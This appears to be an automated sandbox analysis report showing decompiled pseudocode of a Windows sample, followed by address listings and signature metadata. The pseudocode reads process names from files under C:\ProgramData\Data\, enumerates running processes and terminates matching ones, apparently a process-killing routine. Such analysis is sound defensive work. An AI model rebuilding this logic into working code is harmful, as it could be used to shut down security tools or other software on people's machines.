				 *((long long*)(_t605 + 8)) = __rbx;
				 *((long long*)(_t605 + 0x10)) = __rsi;
				 *((long long*)(_t605 + 0x18)) = __rdi;
				_t603 = _t605 - 0x340;
				_t606 = _t605 - 0x440;
				_t363 =  *0xe4ca90a0; // 0x1ae1b17e2973
				 *(_t603 + 0x330) = _t363 ^ _t606;
				asm("xorps xmm1, xmm1");
				asm("movdqu [esp+0x68], xmm1");
				r14d = 0;
				 *(_t606 + 0x78) = _t623;
				 *(_t603 - 0x20) = _t623;
				 *(_t603 - 0x10) = _t623;
				 *((long long*)(_t603 - 8)) = 7;
				 *(_t603 - 0x20) = r14w;
				r8d = 0x110;
				E00007FF67FF6E4C64A30(_t251, _t306, _t603 + 0x220, 0, _t608);
				_t253 = E00007FF67FF6E4C48490(__rbx, _t603 + 0x220, "C:\\ProgramData\\Data\\process.txt"); // executed
				r8d = 0x110;
				E00007FF67FF6E4C64A30(_t253, _t306, _t603 + 0x110, "C:\\ProgramData\\Data\\process.txt" ^ "C:\\ProgramData\\Data\\process.txt", _t608);
				E00007FF67FF6E4C49520(_t431, _t603 + 0x110, "C:\\ProgramData\\Data\\name.txt"); // executed
				 *(_t606 + 0x30) = r14b;
				 *(_t603 - 0x40) = _t623;
				 *(_t603 - 0x30) = _t623;
				 *((long long*)(_t603 - 0x28)) = 0xf;
				 *(_t603 - 0x40) = r14b;
				_t22 = _t623 + 1; // 0x1
				r8d = _t22;
				E00007FF67FF6E4C4A9A0(_t603 - 0x40, _t606 + 0x30, _t608);
				_t447 =  *((intOrPtr*)( *((intOrPtr*)(_t603 +  *((intOrPtr*)( *((intOrPtr*)(_t603 + 0x110)) + 4)) + 0x150)) + 8));
				 *((long long*)(_t606 + 0x40)) = _t447;
				_t370 =  *_t447;
				 *((intOrPtr*)(_t370 + 8))();
				_t371 = _t370;
				E00007FF67FF6E4C4B100(_t431, _t606 + 0x38, __rsi);
				_t259 =  *((long long*)( *((intOrPtr*)( *_t371 + 0x40))))();
				_t451 =  *((intOrPtr*)(_t606 + 0x40));
				if (_t451 == 0) goto 0xe4c4675a;
				 *((intOrPtr*)( *_t451 + 0x10))();
				if (_t371 == 0) goto 0xe4c4675a;
				_t38 = _t623 + 1; // 0x1
				_t308 = _t38;
				 *((long long*)( *((intOrPtr*)( *_t371))))();
				r8d = _t304 & 0x000000ff;
				E00007FF67FF6E4C4D2D0(_t259 & 0x000000ff, _t603 + 0x110, _t603 - 0x40, _t597, _t625);
				_t263 = E00007FF67FF6E4C4A730(_t308, _t259 & 0x000000ff, _t603 + 0x120, _t597, _t620, _t623);
				if (_t371 != 0) goto 0xe4c467b3;
				_t309 =  !=  ? r15d : _t308;
				r8d = 0;
				E00007FF67FF6E4C42B00(_t263,  !=  ? r15d : _t308,  *((long long*)( *((intOrPtr*)( *((intOrPtr*)(_t603 + 0x110)) + 4)) + _t603 + 0x110 + 0x48)),  *((intOrPtr*)( *((intOrPtr*)(_t603 + 0x110)) + 4)) + _t603 + 0x110);
				 *(_t603 - 0x60) = _t623;
				 *(_t603 - 0x50) = _t623;
				 *((long long*)(_t603 - 0x48)) = 0xf;
				 *(_t603 - 0x60) = 0;
				r8d = 0x14;
				E00007FF67FF6E4C4A9A0(_t603 - 0x60, "C:\\ProgramData\\Data\\",  *((intOrPtr*)( *_t371)));
				_t546 =  >=  ?  *(_t603 - 0x40) : _t603 - 0x40;
				_t611 =  *(_t603 - 0x30);
				E00007FF67FF6E4C4AB00(_t259 & 0x000000ff, _t603 - 0x60, 0x6, _t611, _t602);
				_t591 =  >=  ?  *(_t603 - 0x60) : _t603 - 0x60;
				_t592 = ( >=  ?  *(_t603 - 0x60) : _t603 - 0x60) +  *(_t603 - 0x50);
				_t434 =  >=  ?  *(_t603 - 0x60) : _t603 - 0x60;
				 *(_t606 + 0x48) = _t623;
				 *(_t606 + 0x58) = _t623;
				r8d = 7;
				 *((long long*)(_t606 + 0x60)) = _t611;
				 *(_t606 + 0x48) = r14w;
				if (_t592 - _t434 - 8 < 0) goto 0xe4c4685a;
				E00007FF67FF6E4C4C130(_t606 + 0x48, _t592 - _t434, _t592, _t603, _t625);
				_t462 = _t623;
				 *(_t606 + 0x58) = _t462;
				 *((long long*)(_t606 + 0x38)) = _t606 + 0x48;
				if (_t434 == _t592) goto 0xe4c468bc;
				r9d =  *_t434;
				if (_t462 -  *((intOrPtr*)(_t606 + 0x60)) >= 0) goto 0xe4c4689e;
				_t74 = _t462 + 1; // 0x1
				 *(_t606 + 0x58) = _t74;
				_t378 =  >=  ?  *(_t606 + 0x48) : _t606 + 0x48;
				 *((intOrPtr*)(_t378 + _t462 * 2)) = r9w;
				 *(_t378 + 2 + _t462 * 2) = r14w;
				goto 0xe4c468a8;
				E00007FF67FF6E4C4C2A0(_t606 + 0x48, _t592, _t603, _t622, _t625);
				if (_t434 + 1 == _t592) goto 0xe4c468bc;
				goto 0xe4c46870;
				_t594 =  >=  ?  *(_t606 + 0x48) : _t606 + 0x48;
				_t466 =  *((intOrPtr*)( *((intOrPtr*)(_t603 +  *((intOrPtr*)( *((intOrPtr*)(_t603 + 0x220)) + 4)) + 0x260)) + 8));
				 *((long long*)(_t606 + 0x40)) = _t466;
				_t381 =  *_t466;
				 *((intOrPtr*)(_t381 + 8))();
				_t382 = _t381;
				E00007FF67FF6E4C4CCA0(_t434 + 1, _t606 + 0x38, 0x6);
				_t271 =  *((long long*)( *((intOrPtr*)( *_t382 + 0x60))))();
				_t470 =  *((intOrPtr*)(_t606 + 0x40));
				if (_t470 == 0) goto 0xe4c46935;
				 *((intOrPtr*)( *_t470 + 0x10))();
				if (_t382 == 0) goto 0xe4c46935;
				 *_t382();
				r8d = _t304 & 0x0000ffff;
				E00007FF67FF6E4C4D550(_t271 & 0x0000ffff, _t603 + 0x220, _t603 - 0x20, 0x6, _t603);
				if (( *( *((intOrPtr*)( *_t382 + 4)) + _t382 + 0x10) & 0x00000006) != 0) goto 0xe4c46990;
				_t383 =  *((intOrPtr*)(_t606 + 0x70));
				if (_t383 ==  *(_t606 + 0x78)) goto 0xe4c4697a;
				E00007FF67FF6E4C49C50(_t383, _t271 & 0x0000ffff, _t383, _t603 - 0x20, 0x6, _t603);
				 *((long long*)(_t606 + 0x70)) =  *((long long*)(_t606 + 0x70)) + 0x20;
				goto 0xe4c468d0;
				E00007FF67FF6E4C4BB30(_t606 + 0x68, _t383, _t603 - 0x20);
				goto 0xe4c468d0;
				_t277 = E00007FF67FF6E4C4A390(_t271 & 0x0000ffff, _t603 + 0x230, 0x6, _t620);
				if (_t383 != 0) goto 0xe4c469cc;
				_t311 =  !=  ? r15d : 0xa;
				r8d = 0;
				_t278 = E00007FF67FF6E4C42B00(_t277,  !=  ? r15d : 0xa,  *((long long*)( *((intOrPtr*)( *((intOrPtr*)(_t603 + 0x220)) + 4)) + _t603 + 0x220 + 0x48)),  *((intOrPtr*)( *((intOrPtr*)(_t603 + 0x220)) + 4)) + _t603 + 0x220);
				r8d = 0x110;
				E00007FF67FF6E4C64A30(_t278,  !=  ? r15d : 0xa, _t603, 0, _t603 - 0x20);
				E00007FF67FF6E4C48490(_t271 & 0x0000ffff, _t603, "C:\\ProgramData\\Data\\name.txt"); // executed
				 *(_t603 - 0x80) = _t623;
				 *(_t603 - 0x70) = _t623;
				 *((long long*)(_t603 - 0x68)) = 7;
				 *(_t603 - 0x80) = r14w;
				_t482 =  *((intOrPtr*)( *((intOrPtr*)(_t603 +  *((intOrPtr*)( *_t603 + 4)) + 0x40)) + 8));
				 *((long long*)(_t606 + 0x40)) = _t482;
				_t389 =  *_t482;
				 *((intOrPtr*)(_t389 + 8))();
				_t390 = _t389;
				E00007FF67FF6E4C4CCA0(_t271 & 0x0000ffff, _t606 + 0x38, 0x6);
				_t283 =  *((long long*)( *((intOrPtr*)( *_t390 + 0x60))))();
				_t486 =  *((intOrPtr*)(_t606 + 0x40));
				if (_t486 == 0) goto 0xe4c46a63;
				 *((intOrPtr*)( *_t486 + 0x10))();
				if (_t390 == 0) goto 0xe4c46a63;
				 *_t390();
				r8d = _t304 & 0x0000ffff;
				E00007FF67FF6E4C4D550(_t283 & 0x0000ffff, _t603, _t603 - 0x80, 0x6, _t603);
				_t287 = E00007FF67FF6E4C4A390(_t283 & 0x0000ffff, _t603 + 0x10, 0x6, _t620);
				if (_t390 != 0) goto 0xe4c46aa7;
				_t392 = _t603;
				_t314 =  !=  ? r15d : _t313;
				r8d = 0;
				E00007FF67FF6E4C42B00(_t287, 0xa,  *((long long*)( *((intOrPtr*)( *_t603 + 4)) + _t392 + 0x48)),  *((intOrPtr*)( *_t603 + 4)) + _t392);
				E00007FF67FF6E4C45330(_t283 & 0x0000ffff, _t606 + 0x68, 0x00000006 |  *( *((intOrPtr*)( *_t603 + 4)) + _t392 + 0x10),  >=  ?  *(_t606 + 0x48) : _t606 + 0x48, _t603, _t623);
				if (_t392 == 0) goto 0xe4c46aea;
				CloseHandle(??);
				_t495 =  >=  ?  *(_t603 - 0x80) : _t603 - 0x80;
				E00007FF67FF6E4C45470(_t283 & 0x0000ffff,  >=  ?  *(_t603 - 0x80) : _t603 - 0x80, 0x00000006 |  *( *((intOrPtr*)( *_t603 + 4)) + _t392 + 0x10), 0x00000006 |  *( *((intOrPtr*)( *_t603 + 4)) + _t392 + 0x10));
				if (_t392 == 0) goto 0xe4c46b16;
				TerminateProcess(??, ??);
				goto 0xe4c46b0f;
				_t499 =  >=  ?  *(_t603 - 0x80) : _t603 - 0x80;
				E00007FF67FF6E4C45470(_t392,  >=  ?  *(_t603 - 0x80) : _t603 - 0x80, 0, 0x00000006 |  *( *((intOrPtr*)( *_t603 + 4)) + _t392 + 0x10)); // executed
				if (_t392 != 0) goto 0xe4c46b0c;
				E00007FF67FF6E4C45930(_t392,  >=  ?  *(_t606 + 0x48) : _t606 + 0x48, 0x00000006 |  *( *((intOrPtr*)( *_t603 + 4)) + _t392 + 0x10)); // executed
				goto 0xe4c46b16;
				CloseHandle(??);
				_t563 =  *((intOrPtr*)(_t603 - 0x68));
				if (_t563 - 8 < 0) goto 0xe4c46b56;
				if (2 + _t563 * 2 - 0x1000 < 0) goto 0xe4c46b51;
				if ( *(_t603 - 0x80) -  *((intOrPtr*)( *(_t603 - 0x80) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c46e63;
				0xe4c623d0();
				 *(_t603 - 0x70) = _t623;
				 *((long long*)(_t603 - 0x68)) = 7;
				 *(_t603 - 0x80) = r14w;
				 *((long long*)(_t603 +  *((intOrPtr*)( *_t603 + 4)))) = 0xe4ca04d8;
				 *((long long*)(_t603 +  *((intOrPtr*)( *_t603 + 4)) - 4)) =  *((intOrPtr*)( *_t603 + 4)) - 0xb0;
				E00007FF67FF6E4C481B0(_t603 + 0x10);
				 *((long long*)(_t603 +  *((intOrPtr*)( *_t603 + 4)))) = 0xe4ca04e8;
				 *((long long*)(_t603 +  *((intOrPtr*)( *_t603 + 4)) - 4)) =  *((intOrPtr*)( *_t603 + 4)) - 0x18;
				 *((long long*)(_t603 + 0xb0)) = 0xe4c89778;
				E00007FF67FF6E4C61494(_t603 + 0xb0);
				_t568 =  *((intOrPtr*)(_t606 + 0x60));
				if (_t568 - 8 < 0) goto 0xe4c46c16;
				if (2 + _t568 * 2 - 0x1000 < 0) goto 0xe4c46c11;
				if ( *(_t606 + 0x48) -  *((intOrPtr*)( *(_t606 + 0x48) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c46e69;
				0xe4c623d0();
				 *(_t606 + 0x58) = _t623;
				 *((long long*)(_t606 + 0x60)) = 7;
				 *(_t606 + 0x48) = r14w;
				_t571 =  *((intOrPtr*)(_t603 - 0x48));
				if (_t571 - 0x10 < 0) goto 0xe4c46c65;
				if (_t571 + 1 - 0x1000 < 0) goto 0xe4c46c60;
				if ( *(_t603 - 0x60) -  *((intOrPtr*)( *(_t603 - 0x60) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c46e6f;
				0xe4c623d0();
				 *(_t603 - 0x50) = _t623;
				 *((long long*)(_t603 - 0x48)) = 0xf;
				 *(_t603 - 0x60) = 0;
				_t574 =  *((intOrPtr*)(_t603 - 0x28));
				if (_t574 - 0x10 < 0) goto 0xe4c46cb1;
				if (_t574 + 1 - 0x1000 < 0) goto 0xe4c46cab;
				if ( *(_t603 - 0x40) -  *((intOrPtr*)( *(_t603 - 0x40) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c46e75;
				0xe4c623d0();
				 *((long long*)(_t603 +  *((intOrPtr*)( *((intOrPtr*)(_t603 + 0x110)) + 4)) + 0x110)) = 0xe4c89bc0;
				 *((long long*)(_t603 +  *((intOrPtr*)( *((intOrPtr*)(_t603 + 0x110)) + 4)) + 0x10c)) =  *((intOrPtr*)( *((intOrPtr*)(_t603 + 0x110)) + 4)) - 0xb0;
				E00007FF67FF6E4C49470(0xa, _t603 + 0x120);
				 *((long long*)(_t603 +  *((intOrPtr*)( *((intOrPtr*)(_t603 + 0x110)) + 4)) + 0x110)) = 0xe4c89798;
				 *((long long*)(_t603 +  *((intOrPtr*)( *((intOrPtr*)(_t603 + 0x110)) + 4)) + 0x10c)) =  *((intOrPtr*)( *((intOrPtr*)(_t603 + 0x110)) + 4)) - 0x18;
				 *((long long*)(_t603 + 0x1c0)) = 0xe4c89778;
				E00007FF67FF6E4C61494(_t603 + 0x1c0);
				 *((long long*)(_t603 +  *((intOrPtr*)( *((intOrPtr*)(_t603 + 0x220)) + 4)) + 0x220)) = 0xe4ca04d8;
				 *((long long*)(_t603 +  *((intOrPtr*)( *((intOrPtr*)(_t603 + 0x220)) + 4)) + 0x21c)) =  *((intOrPtr*)( *((intOrPtr*)(_t603 + 0x220)) + 4)) - 0xb0;
				E00007FF67FF6E4C481B0(_t603 + 0x230);
				 *((long long*)(_t603 +  *((intOrPtr*)( *((intOrPtr*)(_t603 + 0x220)) + 4)) + 0x220)) = 0xe4ca04e8;
				 *((long long*)(_t603 +  *((intOrPtr*)( *((intOrPtr*)(_t603 + 0x220)) + 4)) + 0x21c)) =  *((intOrPtr*)( *((intOrPtr*)(_t603 + 0x220)) + 4)) - 0x18;
				 *((long long*)(_t603 + 0x2d0)) = 0xe4c89778;
				_t301 = E00007FF67FF6E4C61494(_t603 + 0x2d0);
				_t581 =  *((intOrPtr*)(_t603 - 8));
				if (_t581 - 8 < 0) goto 0xe4c46de6;
				if (2 + _t581 * 2 - 0x1000 < 0) goto 0xe4c46de0;
				if ( *(_t603 - 0x20) -  *((intOrPtr*)( *(_t603 - 0x20) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c46e7b;
				0xe4c623d0();
				if ( *((intOrPtr*)(_t606 + 0x68)) == 0) goto 0xe4c46e31;
				_t302 = E00007FF67FF6E4C4CC10(_t301, 0xe4c89778,  *((intOrPtr*)(_t606 + 0x68)),  *((intOrPtr*)(_t606 + 0x70)), 0xe4ca04e8);
				_t531 =  *((intOrPtr*)(_t606 + 0x68));
				if (( *(_t606 + 0x78) - _t531 & 0xffffffe0) - 0x1000 < 0) goto 0xe4c46e2c;
				if (_t531 -  *((intOrPtr*)(_t531 - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c46e5d;
				0xe4c623d0();
				return E00007FF67FF6E4C623B0(_t302, _t305,  *(_t603 + 0x330) ^ _t606);
			}



























































                                                                                                                                                              0x7ff6e4c46620
                                                                                                                                                              0x7ff6e4c46620
                                                                                                                                                              0x7ff6e4c46620
                                                                                                                                                              0x7ff6e4c46620
                                                                                                                                                              0x7ff6e4c46625
                                                                                                                                                              0x7ff6e4c4662a
                                                                                                                                                              0x7ff6e4c46634
                                                                                                                                                              0x7ff6e4c4663c
                                                                                                                                                              0x7ff6e4c46643
                                                                                                                                                              0x7ff6e4c4664d
                                                                                                                                                              0x7ff6e4c46654
                                                                                                                                                              0x7ff6e4c46657
                                                                                                                                                              0x7ff6e4c4665d
                                                                                                                                                              0x7ff6e4c46660
                                                                                                                                                              0x7ff6e4c46665
                                                                                                                                                              0x7ff6e4c46669
                                                                                                                                                              0x7ff6e4c4666d
                                                                                                                                                              0x7ff6e4c46675
                                                                                                                                                              0x7ff6e4c4667c
                                                                                                                                                              0x7ff6e4c46689
                                                                                                                                                              0x7ff6e4c4669c
                                                                                                                                                              0x7ff6e4c466a4
                                                                                                                                                              0x7ff6e4c466b1
                                                                                                                                                              0x7ff6e4c466c4
                                                                                                                                                              0x7ff6e4c466ca
                                                                                                                                                              0x7ff6e4c466cf
                                                                                                                                                              0x7ff6e4c466d3
                                                                                                                                                              0x7ff6e4c466d7
                                                                                                                                                              0x7ff6e4c466df
                                                                                                                                                              0x7ff6e4c466e3
                                                                                                                                                              0x7ff6e4c466e3
                                                                                                                                                              0x7ff6e4c466f0
                                                                                                                                                              0x7ff6e4c46709
                                                                                                                                                              0x7ff6e4c4670d
                                                                                                                                                              0x7ff6e4c46712
                                                                                                                                                              0x7ff6e4c46715
                                                                                                                                                              0x7ff6e4c46718
                                                                                                                                                              0x7ff6e4c4671e
                                                                                                                                                              0x7ff6e4c4672f
                                                                                                                                                              0x7ff6e4c46735
                                                                                                                                                              0x7ff6e4c4673d
                                                                                                                                                              0x7ff6e4c46742
                                                                                                                                                              0x7ff6e4c46748
                                                                                                                                                              0x7ff6e4c46750
                                                                                                                                                              0x7ff6e4c46750
                                                                                                                                                              0x7ff6e4c46757
                                                                                                                                                              0x7ff6e4c4675a
                                                                                                                                                              0x7ff6e4c46769
                                                                                                                                                              0x7ff6e4c46775
                                                                                                                                                              0x7ff6e4c46786
                                                                                                                                                              0x7ff6e4c467a4
                                                                                                                                                              0x7ff6e4c467ab
                                                                                                                                                              0x7ff6e4c467ae
                                                                                                                                                              0x7ff6e4c467b3
                                                                                                                                                              0x7ff6e4c467b7
                                                                                                                                                              0x7ff6e4c467bb
                                                                                                                                                              0x7ff6e4c467c3
                                                                                                                                                              0x7ff6e4c467c7
                                                                                                                                                              0x7ff6e4c467d8
                                                                                                                                                              0x7ff6e4c467e7
                                                                                                                                                              0x7ff6e4c467ec
                                                                                                                                                              0x7ff6e4c467f4
                                                                                                                                                              0x7ff6e4c46802
                                                                                                                                                              0x7ff6e4c46807
                                                                                                                                                              0x7ff6e4c46814
                                                                                                                                                              0x7ff6e4c46819
                                                                                                                                                              0x7ff6e4c46821
                                                                                                                                                              0x7ff6e4c46826
                                                                                                                                                              0x7ff6e4c4682c
                                                                                                                                                              0x7ff6e4c46831
                                                                                                                                                              0x7ff6e4c46841
                                                                                                                                                              0x7ff6e4c46848
                                                                                                                                                              0x7ff6e4c4684d
                                                                                                                                                              0x7ff6e4c46850
                                                                                                                                                              0x7ff6e4c4685f
                                                                                                                                                              0x7ff6e4c46867
                                                                                                                                                              0x7ff6e4c46870
                                                                                                                                                              0x7ff6e4c46877
                                                                                                                                                              0x7ff6e4c46879
                                                                                                                                                              0x7ff6e4c4687d
                                                                                                                                                              0x7ff6e4c4688b
                                                                                                                                                              0x7ff6e4c46891
                                                                                                                                                              0x7ff6e4c46896
                                                                                                                                                              0x7ff6e4c4689c
                                                                                                                                                              0x7ff6e4c468a3
                                                                                                                                                              0x7ff6e4c468b3
                                                                                                                                                              0x7ff6e4c468ba
                                                                                                                                                              0x7ff6e4c468c5
                                                                                                                                                              0x7ff6e4c468e3
                                                                                                                                                              0x7ff6e4c468e7
                                                                                                                                                              0x7ff6e4c468ec
                                                                                                                                                              0x7ff6e4c468ef
                                                                                                                                                              0x7ff6e4c468f2
                                                                                                                                                              0x7ff6e4c468f8
                                                                                                                                                              0x7ff6e4c46909
                                                                                                                                                              0x7ff6e4c4690f
                                                                                                                                                              0x7ff6e4c46917
                                                                                                                                                              0x7ff6e4c4691c
                                                                                                                                                              0x7ff6e4c46922
                                                                                                                                                              0x7ff6e4c46933
                                                                                                                                                              0x7ff6e4c46935
                                                                                                                                                              0x7ff6e4c46944
                                                                                                                                                              0x7ff6e4c46955
                                                                                                                                                              0x7ff6e4c46957
                                                                                                                                                              0x7ff6e4c46961
                                                                                                                                                              0x7ff6e4c4696a
                                                                                                                                                              0x7ff6e4c4696f
                                                                                                                                                              0x7ff6e4c46975
                                                                                                                                                              0x7ff6e4c46986
                                                                                                                                                              0x7ff6e4c4698b
                                                                                                                                                              0x7ff6e4c46997
                                                                                                                                                              0x7ff6e4c4699f
                                                                                                                                                              0x7ff6e4c469bd
                                                                                                                                                              0x7ff6e4c469c4
                                                                                                                                                              0x7ff6e4c469c7
                                                                                                                                                              0x7ff6e4c469ce
                                                                                                                                                              0x7ff6e4c469d8
                                                                                                                                                              0x7ff6e4c469e8
                                                                                                                                                              0x7ff6e4c469ee
                                                                                                                                                              0x7ff6e4c469f2
                                                                                                                                                              0x7ff6e4c469f6
                                                                                                                                                              0x7ff6e4c469fe
                                                                                                                                                              0x7ff6e4c46a10
                                                                                                                                                              0x7ff6e4c46a14
                                                                                                                                                              0x7ff6e4c46a19
                                                                                                                                                              0x7ff6e4c46a1c
                                                                                                                                                              0x7ff6e4c46a1f
                                                                                                                                                              0x7ff6e4c46a25
                                                                                                                                                              0x7ff6e4c46a36
                                                                                                                                                              0x7ff6e4c46a3c
                                                                                                                                                              0x7ff6e4c46a44
                                                                                                                                                              0x7ff6e4c46a49
                                                                                                                                                              0x7ff6e4c46a50
                                                                                                                                                              0x7ff6e4c46a61
                                                                                                                                                              0x7ff6e4c46a63
                                                                                                                                                              0x7ff6e4c46a6f
                                                                                                                                                              0x7ff6e4c46a78
                                                                                                                                                              0x7ff6e4c46a80
                                                                                                                                                              0x7ff6e4c46a8a
                                                                                                                                                              0x7ff6e4c46a96
                                                                                                                                                              0x7ff6e4c46a9d
                                                                                                                                                              0x7ff6e4c46aa2
                                                                                                                                                              0x7ff6e4c46aac
                                                                                                                                                              0x7ff6e4c46ab4
                                                                                                                                                              0x7ff6e4c46ab9
                                                                                                                                                              0x7ff6e4c46ac8
                                                                                                                                                              0x7ff6e4c46acd
                                                                                                                                                              0x7ff6e4c46ad8
                                                                                                                                                              0x7ff6e4c46adf
                                                                                                                                                              0x7ff6e4c46ae8
                                                                                                                                                              0x7ff6e4c46af3
                                                                                                                                                              0x7ff6e4c46af8
                                                                                                                                                              0x7ff6e4c46b00
                                                                                                                                                              0x7ff6e4c46b05
                                                                                                                                                              0x7ff6e4c46b0a
                                                                                                                                                              0x7ff6e4c46b0f
                                                                                                                                                              0x7ff6e4c46b16
                                                                                                                                                              0x7ff6e4c46b1e
                                                                                                                                                              0x7ff6e4c46b36
                                                                                                                                                              0x7ff6e4c46b4b
                                                                                                                                                              0x7ff6e4c46b51
                                                                                                                                                              0x7ff6e4c46b56
                                                                                                                                                              0x7ff6e4c46b5a
                                                                                                                                                              0x7ff6e4c46b62
                                                                                                                                                              0x7ff6e4c46b76
                                                                                                                                                              0x7ff6e4c46b89
                                                                                                                                                              0x7ff6e4c46b91
                                                                                                                                                              0x7ff6e4c46ba5
                                                                                                                                                              0x7ff6e4c46bb5
                                                                                                                                                              0x7ff6e4c46bc0
                                                                                                                                                              0x7ff6e4c46bce
                                                                                                                                                              0x7ff6e4c46bd4
                                                                                                                                                              0x7ff6e4c46bdd
                                                                                                                                                              0x7ff6e4c46bf6
                                                                                                                                                              0x7ff6e4c46c0b
                                                                                                                                                              0x7ff6e4c46c11
                                                                                                                                                              0x7ff6e4c46c16
                                                                                                                                                              0x7ff6e4c46c1b
                                                                                                                                                              0x7ff6e4c46c24
                                                                                                                                                              0x7ff6e4c46c2a
                                                                                                                                                              0x7ff6e4c46c32
                                                                                                                                                              0x7ff6e4c46c45
                                                                                                                                                              0x7ff6e4c46c5a
                                                                                                                                                              0x7ff6e4c46c60
                                                                                                                                                              0x7ff6e4c46c65
                                                                                                                                                              0x7ff6e4c46c69
                                                                                                                                                              0x7ff6e4c46c71
                                                                                                                                                              0x7ff6e4c46c75
                                                                                                                                                              0x7ff6e4c46c7d
                                                                                                                                                              0x7ff6e4c46c90
                                                                                                                                                              0x7ff6e4c46ca5
                                                                                                                                                              0x7ff6e4c46cab
                                                                                                                                                              0x7ff6e4c46cc3
                                                                                                                                                              0x7ff6e4c46cdc
                                                                                                                                                              0x7ff6e4c46cea
                                                                                                                                                              0x7ff6e4c46d01
                                                                                                                                                              0x7ff6e4c46d17
                                                                                                                                                              0x7ff6e4c46d1e
                                                                                                                                                              0x7ff6e4c46d2c
                                                                                                                                                              0x7ff6e4c46d3d
                                                                                                                                                              0x7ff6e4c46d56
                                                                                                                                                              0x7ff6e4c46d64
                                                                                                                                                              0x7ff6e4c46d74
                                                                                                                                                              0x7ff6e4c46d8a
                                                                                                                                                              0x7ff6e4c46d91
                                                                                                                                                              0x7ff6e4c46d9f
                                                                                                                                                              0x7ff6e4c46da5
                                                                                                                                                              0x7ff6e4c46dad
                                                                                                                                                              0x7ff6e4c46dc5
                                                                                                                                                              0x7ff6e4c46dda
                                                                                                                                                              0x7ff6e4c46de0
                                                                                                                                                              0x7ff6e4c46dee
                                                                                                                                                              0x7ff6e4c46df5
                                                                                                                                                              0x7ff6e4c46dff
                                                                                                                                                              0x7ff6e4c46e15
                                                                                                                                                              0x7ff6e4c46e2a
                                                                                                                                                              0x7ff6e4c46e2c
                                                                                                                                                              0x7ff6e4c46e5c

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo_noreturn$CloseHandleProcess32$Next$CreateFirstLockitLockit::_ProcessSleepSnapshotTerminateToolhelp32__std_exception_copystd::_
                                                                                                                                                              • String ID: $C:\ProgramData\Data\$C:\ProgramData\Data\name.txt$C:\ProgramData\Data\process.txt
                                                                                                                                                              • API String ID: 2480615077-1408848187
                                                                                                                                                              • Opcode ID: e6e10aa64ce4514b4b70d30356b9bb9b560162e065d511cebd12883b927f1528
                                                                                                                                                              • Instruction ID: c2b07a37bc3417187b1feb9cd71c9b2a40332f33fc6e9c55ec5d8d0cd3ed902f
                                                                                                                                                              • Opcode Fuzzy Hash: e6e10aa64ce4514b4b70d30356b9bb9b560162e065d511cebd12883b927f1528
                                                                                                                                                              • Instruction Fuzzy Hash: 7A327537B54B8685EB10CB79D5943EC27B1FB88B88F508136DA0D87AA9DF3AD542C305
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C62760 Relevance: 3.0, APIs: 2, Instructions: 18COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 72%
                                                                                                                                                              			E00007FF67FF6E4C62760(void* __edx, void* __edi, void* __ebp, void* __esp, void* __eflags, signed int __rax, long long __rbx, long long __rsi, void* __r8, void* __r9, long long _a8, long long _a16) {
				char _v24;
				void* __rdi;
				_Unknown_base(*)()* _t17;
				void* _t18;
				void* _t38;
				void* _t44;
				signed int _t58;
				intOrPtr* _t60;
				intOrPtr* _t61;
				long long _t72;
				void* _t83;
				void* _t88;
				void* _t94;
				void* _t96;

				_t96 = __r9;
				_t94 = __r8;
				_t86 = __rsi;
				_t63 = __rbx;
				_t58 = __rax;
				_t44 = __ebp;
				E00007FF67FF6E4C63100(); // executed
				_t17 = SetUnhandledExceptionFilter(??);
				goto 0xe4c73fe4;
				asm("int3");
				asm("int3");
				asm("int3");
				_a8 = __rbx;
				_a16 = __rsi;
				 *((long long*)(__rax + 0x136840f + __rax * 8)) =  *((long long*)(__rax + 0x136840f + __rax * 8)) + 1;
				 *__rax =  *__rax + _t17;
				sil = 0;
				_v24 = sil;
				_t18 = E00007FF67FF6E4C62414();
				_t72 =  *0xe4caab70; // 0x2
				if (_t72 == 1) goto 0xe4c628de;
				if (_t72 != 0) goto 0xe4c62809;
				 *0xe4caab70 = 1;
				E00007FF67FF6E4C72ADC(__rbx, 0xe4c89538, 0xe4c89570);
				if (_t58 == 0) goto 0xe4c627ea;
				 *0xD9E90000008C =  *((intOrPtr*)(0xd9e90000008c)) + _t38;
				asm("adc eax, 0x26d3f");
				E00007FF67FF6E4C72A78(_t63, 0xe4c894d8, 0xe4c89570, __rsi, _t88); // executed
				 *0xe4caab70 = 2;
				goto 0xe4c62811;
				sil = 1;
				_v24 = sil;
				E00007FF67FF6E4C63260(E00007FF67FF6E4C625C0(_t18, 0xe4c89570));
				if ( *0xff == 0) goto 0xe4c62844;
				if (E00007FF67FF6E4C62528(0xff, 0xff) == 0) goto 0xe4c62844;
				r8d = 0;
				_t13 = _t94 + 2; // 0x2
				_t60 =  *0xff;
				E00007FF67FF6E4C63268( *0xe4c894c0(_t83));
				if ( *_t60 == 0) goto 0xe4c62866;
				if (E00007FF67FF6E4C62528(_t60, _t60) == 0) goto 0xe4c62866;
				E00007FF67FF6E4C71CF0( *_t60);
